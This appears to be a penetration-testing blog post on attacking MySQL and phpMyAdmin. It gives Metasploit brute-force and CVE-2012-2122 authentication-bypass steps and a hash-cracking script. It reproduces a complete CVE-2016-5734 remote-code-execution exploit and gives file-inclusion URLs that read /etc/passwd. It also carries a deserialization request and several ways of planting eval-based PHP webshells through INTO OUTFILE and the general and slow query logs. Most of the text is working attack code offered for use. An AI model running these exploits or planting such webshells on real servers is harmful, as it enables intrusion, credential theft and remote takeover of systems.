
MySQL Attack and Defense

Common exploitation approaches for the MySQL service

MySQL weak passwords

By default MySQL only allows root to log in from localhost, so remote brute forcing only pays off on instances where that default has been loosened (bind-address opened up and root or another account granted access from remote hosts).

port="3306"

1. Use a database credential brute-force tool directly, such as Tscan.

2. Use the Metasploit MySQL login scanner to brute force:

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.145
RHOSTS => 192.168.1.145
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
user_file => user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file passwd.txt
pass_file => passwd.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

MySQL authentication bypass (CVE-2012-2122)

Reference: "Pentest learning DAY1 for a fourth-year security student: authentication bypass CVE-2012-2122" (CSDN blog)

On affected builds (MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24, plus the matching MariaDB releases) check_scramble() returns the int from memcmp() through a my_bool, so whenever the optimised memcmp yields a multiple of 256 a wrong password is accepted. That happens about once in 256 attempts, so a few hundred logins with any password are enough:

# keep trying with a wrong password; the attempt that is accepted drops into the mysql shell
for i in `seq 1 1000`; do
  mysql -h 127.0.0.1 -P 3306 -uroot -p123 2>/dev/null
done

# or let Metasploit do the same and dump mysql.user on success
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set rhost 127.0.0.1
exploit

The hashdump module then pulls the password hashes out of mysql.user; crack them offline (they are hashes, not ciphertext that can be decrypted).
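The hashes that come out of the dump above are mysql_native_password values. The following is an added example (not code from the original post) that shows what those hashes are, how the server checks a login against them, where the CVE-2012-2122 truncation sits in that check, and why the dump can be cracked offline with a plain wordlist. The dump line and the wordlist are constructed for the demo; everything else is the documented mysql_native_password scheme.

```python
#!/usr/bin/env python3
"""mysql_native_password: stored hash, challenge-response, and offline cracking.

Added example, not code from the original post. The dump line and wordlist
below are constructed for the demo.
"""
import hashlib


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_native_hash(password: str) -> str:
    """What PASSWORD() stores in mysql.user: '*' + hex(SHA1(SHA1(password)))."""
    stage1 = sha1(password.encode())
    stage2 = sha1(stage1)
    return "*" + stage2.hex().upper()


def client_scramble(password: str, salt: bytes) -> bytes:
    """Client's reply to the 20-byte server salt:
    SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    stage1 = sha1(password.encode())
    stage2 = sha1(stage1)
    mask = sha1(salt + stage2)
    return bytes(a ^ b for a, b in zip(stage1, mask))


def server_check(reply: bytes, salt: bytes, stored_hash: str) -> bool:
    """Server side: unmask SHA1(pw) from the reply, hash it once more and
    compare with the stored stage2. This is the compare that CVE-2012-2122
    broke: check_scramble() returned memcmp()'s int through a my_bool (char),
    see truncated_to_my_bool()."""
    stage2 = bytes.fromhex(stored_hash.lstrip("*"))
    mask = sha1(salt + stage2)
    stage1 = bytes(a ^ b for a, b in zip(reply, mask))
    return sha1(stage1) == stage2


def truncated_to_my_bool(memcmp_result: int) -> int:
    """Models the CVE-2012-2122 bug: an int from memcmp() squeezed into a
    signed char. Any non-zero result that is a multiple of 256 becomes 0,
    which the caller reads as 'password correct'. Stock memcmp returns
    small values, but SSE-optimised builds return arbitrary differences,
    so roughly 1 in 256 wrong passwords is accepted."""
    return ((memcmp_result + 128) % 256) - 128


def parse_hashdump_line(line: str):
    """'user:*HASH' pairs, the format the Metasploit hashdump module saves."""
    user, stored = line.strip().split(":", 1)
    return user, stored.upper()


def crack(stored_hash: str, wordlist):
    """Offline dictionary attack: there is no salt, so one SHA1(SHA1(w)) per word."""
    target = stored_hash.upper()
    for word in wordlist:
        if mysql_native_hash(word) == target:
            return word
    return None


if __name__ == "__main__":
    dump_line = "root:*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29"  # constructed dump line
    user, stored = parse_hashdump_line(dump_line)
    wordlist = ["123456", "password", "root", "test", "admin"]      # constructed wordlist
    print(user, crack(stored, wordlist))
```

Because the stored value is an unsalted double SHA1, cracking speed is limited only by hashing throughput; hashcat mode 300 does the same computation on a GPU.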

phpMyAdmin exploitation

inurl:phpmyadmin      // search-engine dork for exposed instances

Reference: "[Attack and defense in practice] phpMyAdmin RCE collection"

CVE-2016-5734

Affected versions: phpMyAdmin 4.0.x through 4.6.2 (fixed in 4.0.10.16, 4.4.15.7 and 4.6.3). The exploit additionally needs PHP older than 5.4.7, where a null byte truncates a regex pattern.

Open phpMyAdmin and log in; in this lab both the username and the password are root. Valid credentials are required: this is an authenticated RCE.

#!/usr/bin/env python

"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"

    size = 32
    s = requests.Session()
    # you can manually add proxy support it's very simple ;
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    sql = '''CREATE TABLE `{0}` (
      `first` varchar(10) CHARACTER SET utf8 NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=latin1;
    INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
    '''.format(table)

    # get_token
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    if resp.status_code == 200:  # compare with ==, 'is' on an int is not reliable
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + 32]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)
    # build exploit
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
        print(
            "Exploit failed!\n"
            "Try to manually set exploit parameters like --table, --database and --token.\n"
            "Remember that servers with PHP version greater than 5.4.6"
            " is not exploitable, because of warning about null byte in regexp"
        )
        sys.exit(1)
python .\CVE-2016-5734.py -u root -p root http://192.168.165.41:8080/ -c "system('cat /etc/passwd')"

CVE-2018-12613

phpMyAdmin 4.8.0 and 4.8.1 local file inclusion through the target parameter of index.php (fixed in 4.8.2). In its simplest form it is an arbitrary file read:

http://192.168.0.108:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

Deeper exploitation: from file read to code execution

SELECT '<?php phpinfo()?>'      // run this in the phpMyAdmin SQL tab; phpMyAdmin keeps the query text in the PHP session file

Then use the file inclusion to include the PHP session file, which now contains that PHP code:

http://192.168.0.104:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5587bc62c8c09503e2882a8594d89ff7

// 5587bc62c8c09503e2882a8594d89ff7 is the phpMyAdmin cookie value, i.e. the PHP session ID; session files are named sess_<id> under session.save_path (/tmp by default)

WooYun-2016-199433

phpMyAdmin 2.x has a deserialization vulnerability in scripts/setup.php: the configuration parameter is passed to unserialize(), and a crafted PMA_Config object whose source property points at a file makes the application include that file. That gives arbitrary file read, and code execution if an attacker-controlled file can be included.

POST /scripts/setup.php HTTP/1.1
Host: 192.168.0.104:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.0.104:8080/
Cookie: phpMyAdmin=5587bc62c8c09503e2882a8594d89ff7; pma_lang=zh_CN
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

Getting a shell through phpMyAdmin with weak credentials

Reference: "phpMyAdmin page getshell" (Tencent Cloud developer community)

Writing a file directly with SELECT ... INTO OUTFILE

Prerequisites:

  1. The MySQL account has the FILE privilege (in practice root), the mysqld process can write to the web directory, and single quotes can be used in the query
  2. The absolute path of the web root is known (error pages / phpinfo / a PHP probe page)
  3. secure_file_priv is empty (no value)
show global variables like '%secure%';      // check secure_file_priv

secure_file_priv restricts the directory in which LOAD DATA, SELECT ... INTO OUTFILE/DUMPFILE and LOAD_FILE() are allowed to read or write files.

secure_file_priv = NULL: mysqld allows no import or export at all, so no file can be written
secure_file_priv = /tmp/: import and export are confined to /tmp/, so nothing can be placed in the web root
secure_file_priv = '' (empty): no restriction, a file can be written anywhere the mysqld process has write access

Since MySQL 5.5.53 the compiled-in default is no longer empty (Linux packages typically ship /var/lib/mysql-files), so this path usually only works on older or deliberately loosened installations.

secure_file_priv is read-only at runtime; it can only be changed in the configuration file followed by a restart.

show variables like "%plugin%";      // plugin_dir reveals the MySQL installation directory

// write a PHP file into the web root (phpinfo() here; a one-line webshell is written the same way; fails if the file already exists)
select '<?php phpinfo(); ?>' INTO OUTFILE 'C:\\phpstudy\\phpstudy_pro\\WWW\\b.php'

Writing a shell through the general query log

Check the status of the general log. It is off by default because it records every statement and the volume is a significant resource cost.

SHOW VARIABLES LIKE '%general%'

general_log_file is the path the log is written to.

Enabling general_log

With general_log enabled the server records every statement it receives into the file named by general_log_file; this is the general query log.

Approach: enable general_log, point general_log_file at a custom .php file under the web root, execute a query whose text contains a one-line webshell so that it lands in the log, then use the shell.

Note: record the original log path before changing it; after getting the shell, restore it. Changing these globals requires SUPER (SYSTEM_VARIABLES_ADMIN on MySQL 8), and the log only reaches the file if log_output contains FILE.

set global general_log = on;

// point the log file at the shell path
set global general_log_file='C:\\phpstudy\\phpstudy_pro\\WWW\\webapp.php';
// the statement text is copied verbatim into the log file, which the web server now serves as PHP
select '<?php eval($_POST[cmd]);?>'

Getting a shell through the slow query log

Slow query log: the threshold is set with long_query_time, in seconds with microsecond precision. A query that runs longer than this value (default 10 seconds) is written to the slow query log.

show global variables like '%long_query_time%'
show global variables like '%long%'

// check the slow log parameters
show global variables like '%slow%'

set global slow_query_log=1 		# enable the slow log
set global slow_query_log_file='C:\\phpstudy\\phpstudy_pro\\WWW\\webbpp.php'	# slow log path [note: use double backslashes]
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)		# 11 seconds exceeds the 10-second default threshold
SELECT '<?php phpinfo();?>' or sleep(11)

By Lsec
Last updated on Jun 14, 2025 15:37 +0800